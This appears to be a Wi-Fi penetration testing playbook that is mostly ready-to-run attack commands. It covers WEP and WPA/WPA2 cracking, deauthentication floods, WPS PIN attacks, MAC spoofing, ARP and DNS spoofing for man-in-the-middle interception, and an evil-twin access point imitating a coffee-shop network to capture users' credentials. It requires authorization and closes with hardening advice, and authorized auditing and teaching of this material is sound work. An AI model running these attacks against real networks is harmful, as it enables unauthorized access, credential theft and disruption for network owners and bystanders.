Wi-Fi Penetration Testing

Purpose

Assess wireless network security by testing encryption strength, capturing authentication handshakes, and exploiting vulnerabilities in Wi-Fi implementations. This skill covers reconnaissance, pre-connection attacks, encryption cracking, and post-connection exploitation techniques for comprehensive wireless security auditing.

Prerequisites

Required Hardware

• Wireless adapter supporting monitor mode and packet injection

• Recommended chipsets: Atheros AR9271, Realtek RTL8812AU, Alfa AWUS036ACH

• Computer running Kali Linux or similar penetration testing OS

Required Tools

Core wireless tools

sudo apt-get install aircrack-ng wireshark reaver

Additional tools

sudo apt-get install ettercap-graphical bettercap hostapd-wpe

Required Knowledge

• Understanding of 802.11 wireless protocols

• Wi-Fi security protocols (WEP, WPA, WPA2, WPA3)

• Basic networking concepts

• Linux command-line proficiency

Required Access

• Written authorization from network owner

• Physical proximity to target network

• Test environment for practice

Outputs and Deliverables

• Wireless Security Assessment Report - Document network vulnerabilities and encryption weaknesses

• Captured Handshakes - WPA/WPA2 4-way handshake files for analysis

• Cracked Credentials - Successfully recovered network passwords

• Remediation Recommendations - Security hardening guidance

Core Workflow

Phase 1: Wireless Adapter Setup

Connect and verify wireless adapter capabilities:

Check if adapter is recognized

lsusb

Look for: "Realtek Semiconductor Corp." or "Atheros Communications"

Verify wireless interface exists

ifconfig iwconfig

Install drivers if needed (Realtek example)

sudo apt-get update sudo apt-get install realtek-rtl88xxau-dkms

Phase 2: Enable Monitor Mode

Configure adapter for packet capture:

Check current mode

iwconfig wlan0

Kill interfering processes

sudo airmon-ng check kill

Enable monitor mode

sudo airmon-ng start wlan0

Verify monitor mode (interface becomes wlan0mon)

iwconfig wlan0mon

Should show: Mode: Monitor

Phase 3: Network Discovery

Scan for available wireless networks:

Scan all networks

sudo airodump-ng wlan0mon

Output columns:

BSSID - Access point MAC address

PWR - Signal strength (higher = closer)

Beacons - Number of beacon frames

#Data - Number of data packets

#/s - Data packets per second

CH - Channel

MB - Maximum speed

ENC - Encryption (WEP, WPA, WPA2, OPN)

CIPHER - Cipher (CCMP, TKIP, WEP)

AUTH - Authentication (PSK, MGT, SKA, OPN)

ESSID - Network name

Filter by specific channel

sudo airodump-ng -c 6 wlan0mon

Filter by BSSID

sudo airodump-ng --bssid AA:BB:CC:DD:EE:FF wlan0mon

Phase 4: Target Specific Network

Focus capture on target network:

Capture packets from specific network

sudo airodump-ng --bssid [TARGET_BSSID] -c [CHANNEL] -w capture wlan0mon

Example:

sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 -w capture wlan0mon

This creates:

capture-01.cap - Packet capture file

capture-01.csv - CSV with network info

capture-01.kismet.csv - Kismet format

Phase 5: WEP Cracking

Crack outdated WEP encryption:

Step 1: Start capture on target

sudo airodump-ng --bssid [BSSID] -c [CH] -w wep_capture wlan0mon

Step 2: Fake authentication (if needed)

sudo aireplay-ng -1 0 -e [SSID] -a [BSSID] -h [YOUR_MAC] wlan0mon

Step 3: ARP replay attack (generate traffic)

sudo aireplay-ng -3 -b [BSSID] -h [YOUR_MAC] wlan0mon

Step 4: Wait for sufficient IVs (typically 20,000+)

Monitor #Data column in airodump-ng

Step 5: Crack the key

sudo aircrack-ng wep_capture-01.cap

Output: KEY FOUND! [ XX:XX:XX:XX:XX ]

Phase 6: WPA/WPA2 Handshake Capture

Capture 4-way handshake for offline cracking:

Step 1: Monitor target network

sudo airodump-ng --bssid [BSSID] -c [CH] -w wpa_capture wlan0mon

Step 2: Wait for client connection OR force deauthentication

Deauth attack (forces reconnection)

sudo aireplay-ng --deauth 10 -a [BSSID] wlan0mon

Deauth specific client

sudo aireplay-ng --deauth 10 -a [BSSID] -c [CLIENT_MAC] wlan0mon

Step 3: Watch for "WPA handshake: [BSSID]" in airodump-ng

Step 4: Verify handshake capture

sudo aircrack-ng wpa_capture-01.cap

Should show: "1 handshake"

Phase 7: WPA/WPA2 Password Cracking

Crack captured handshake with wordlist:

Dictionary attack

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b [BSSID] wpa_capture-01.cap

Using custom wordlist

sudo aircrack-ng -w custom_wordlist.txt -b [BSSID] wpa_capture-01.cap

Using hashcat (faster with GPU)

Convert capture to hashcat format

sudo aircrack-ng -j hash wpa_capture-01.cap

Run hashcat

hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt

Brute force with hashcat (8-character passwords)

hashcat -m 22000 -a 3 hash.hc22000 ?a?a?a?a?a?a?a?a

Phase 8: WPS Attack

Exploit Wi-Fi Protected Setup vulnerabilities:

Scan for WPS-enabled networks

sudo wash -i wlan0mon

Attack WPS PIN

sudo reaver -i wlan0mon -b [BSSID] -vv

Faster Pixie-Dust attack

sudo reaver -i wlan0mon -b [BSSID] -vv -K 1

Using bully (alternative tool)

sudo bully -b [BSSID] -c [CH] wlan0mon

Phase 9: Post-Connection Attacks

After gaining network access:

Man-in-the-Middle Attack:

Enable IP forwarding

echo 1 > /proc/sys/net/ipv4/ip_forward

ARP spoofing with ettercap

sudo ettercap -T -q -i wlan0 -M arp:remote /[VICTIM_IP]// /[ROUTER_IP]//

Using arpspoof

sudo arpspoof -i wlan0 -t [VICTIM_IP] [ROUTER_IP] sudo arpspoof -i wlan0 -t [ROUTER_IP] [VICTIM_IP]

DNS Spoofing:

Create etter.dns file

echo "* A [YOUR_IP]" > /etc/ettercap/etter.dns

Run ettercap with DNS spoofing

sudo ettercap -T -q -i wlan0 -M arp:remote -P dns_spoof /[VICTIM_IP]// /[ROUTER_IP]//

Capture Credentials:

Capture HTTP traffic

sudo tcpdump -i wlan0 -w traffic.pcap

Capture with specific filters

sudo tcpdump -i wlan0 port 80 or port 443 -w web_traffic.pcap

Analyze with Wireshark

wireshark traffic.pcap

Phase 10: MAC Address Spoofing

Evade MAC-based access controls:

View current MAC

ifconfig wlan0 | grep ether

Disable interface

sudo ifconfig wlan0 down

Change MAC address

sudo ifconfig wlan0 hw ether 00:11:22:33:44:55

Or use macchanger

sudo macchanger -r wlan0 # Random MAC sudo macchanger -m 00:11:22:33:44:55 wlan0 # Specific MAC

Enable interface

sudo ifconfig wlan0 up

Quick Reference

Essential Commands

Action Command

Enable monitor mode sudo airmon-ng start wlan0

Disable monitor mode sudo airmon-ng stop wlan0mon

Scan networks sudo airodump-ng wlan0mon

Target network sudo airodump-ng --bssid [BSSID] -c [CH] -w capture wlan0mon

Deauth attack sudo aireplay-ng --deauth 10 -a [BSSID] wlan0mon

Crack WPA sudo aircrack-ng -w wordlist.txt capture.cap

WPS attack sudo reaver -i wlan0mon -b [BSSID] -vv

Kill processes sudo airmon-ng check kill

Wi-Fi Security Protocols

Protocol Security Level Cracking Difficulty

Open None N/A - No encryption

WEP Very Weak Easy - Minutes with traffic

WPA-TKIP Weak Medium - Dictionary attack

WPA2-PSK Moderate Hard - Strong password resistant

WPA2-Enterprise Strong Very Hard - Requires credentials

WPA3 Strong Very Hard - Dragonfly handshake

Common Wordlists

Kali Linux wordlists

/usr/share/wordlists/rockyou.txt /usr/share/wordlists/fasttrack.txt /usr/share/wordlists/nmap.lst /usr/share/john/password.lst

Download SecLists

git clone https://github.com/danielmiessler/SecLists

Wi-Fi specific: SecLists/Passwords/WiFi-WPA/

Signal Strength Guide

PWR Value Quality Recommended Action

-30 to -50 Excellent Ideal for testing

-50 to -60 Good Reliable capture

-60 to -70 Fair May miss packets

-70 to -80 Weak Move closer

Below -80 Poor Not viable

Constraints and Limitations

Legal Constraints

• Only test networks you own or have written authorization to test

• Unauthorized wireless access is illegal in most jurisdictions

• Deauthentication attacks may violate FCC regulations

• Document all testing activities for legal protection

Technical Limitations

• WPA3 uses Dragonfly handshake resistant to offline attacks

• Strong passwords (12+ random characters) are practically uncrackable

• Enterprise authentication requires different attack vectors

• Some adapters don't support 5GHz or certain channels

Environmental Factors

• Signal strength affects capture quality

• Interference from other networks

• Physical obstacles reduce range

• Client activity needed for handshake capture

Examples

Example 1: Complete WPA2 Attack

Scenario: Audit home network security

Step 1: Setup

sudo airmon-ng check kill sudo airmon-ng start wlan0

Step 2: Find target

sudo airodump-ng wlan0mon

Note: BSSID=00:11:22:33:44:55, CH=6, ESSID=HomeNetwork

Step 3: Capture handshake

sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 -w home_capture wlan0mon

Step 4: Deauth client (new terminal)

sudo aireplay-ng --deauth 5 -a 00:11:22:33:44:55 wlan0mon

Step 5: Wait for "WPA handshake" message

Step 6: Crack password

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt home_capture-01.cap

Result: KEY FOUND! [ password123 ]

Example 2: Evil Twin Attack

Scenario: Create rogue access point for credential capture

Step 1: Get target network details

sudo airodump-ng wlan0mon

Target: "CoffeeShop_WiFi" on channel 1

Step 2: Create hostapd config

cat > /tmp/hostapd.conf << EOF interface=wlan1 driver=nl80211 ssid=CoffeeShop_WiFi channel=1 EOF

Step 3: Start rogue AP

sudo hostapd /tmp/hostapd.conf

Step 4: Setup DHCP and DNS

sudo dnsmasq -C /tmp/dnsmasq.conf

Step 5: Capture credentials with captive portal

Example 3: Hidden Network Discovery

Scenario: Discover and connect to hidden SSID

Hidden networks show <length: X> in ESSID column

sudo airodump-ng wlan0mon

Force client deauth to reveal SSID in probe request

sudo aireplay-ng --deauth 5 -a [BSSID] wlan0mon

ESSID will appear when client reconnects

Or use mdk3 for probe request flood

sudo mdk3 wlan0mon p -t [BSSID]

Troubleshooting

Monitor Mode Not Working

Problem: airmon-ng start wlan0 fails or no monitor interface created

Solutions:

• Install correct drivers for your adapter chipset

• Check if adapter supports monitor mode: iw list | grep monitor

• Kill interfering processes: sudo airmon-ng check kill

• Try manual method: sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo ifconfig wlan0 up

• Update kernel and drivers

No Handshake Captured

Problem: Deauth attacks not producing handshake

Solutions:

• Ensure client is actively connected to target network

• Increase deauth packet count: --deauth 50

• Target specific client instead of broadcast

• Move closer to access point for better signal

• Verify you're on the correct channel

• Check if AP has client isolation enabled

Aircrack-ng Not Finding Password

Problem: Wordlist exhausted without finding password

Solutions:

• Verify handshake is complete: aircrack-ng capture.cap

• Use larger wordlists or create custom targeted list

• Try hashcat with GPU acceleration

• Use rule-based attacks to mutate wordlist

• Consider that password may be truly strong/random

Injection Not Working

Problem: Deauth packets not affecting clients

Solutions:

• Verify injection support: aireplay-ng -9 wlan0mon

• Use correct driver for your adapter

• Check if target uses 802.11w (Management Frame Protection)

• Ensure you're close enough to target

• Try different deauth techniques

Security Recommendations

For Network Administrators

• Use WPA3 when devices support it

• Strong Passwords - Minimum 12 random characters

• Disable WPS - Known vulnerability vector

• MAC Filtering - Defense in depth (not sole protection)

• Hidden SSID - Minor obfuscation (not security)

• Regular Audits - Test your own networks periodically

• Guest Networks - Isolate untrusted devices

• Update Firmware - Patch known vulnerabilities

• Enterprise Auth - Use RADIUS for business networks

• Monitor Logs - Detect deauth and rogue AP attacks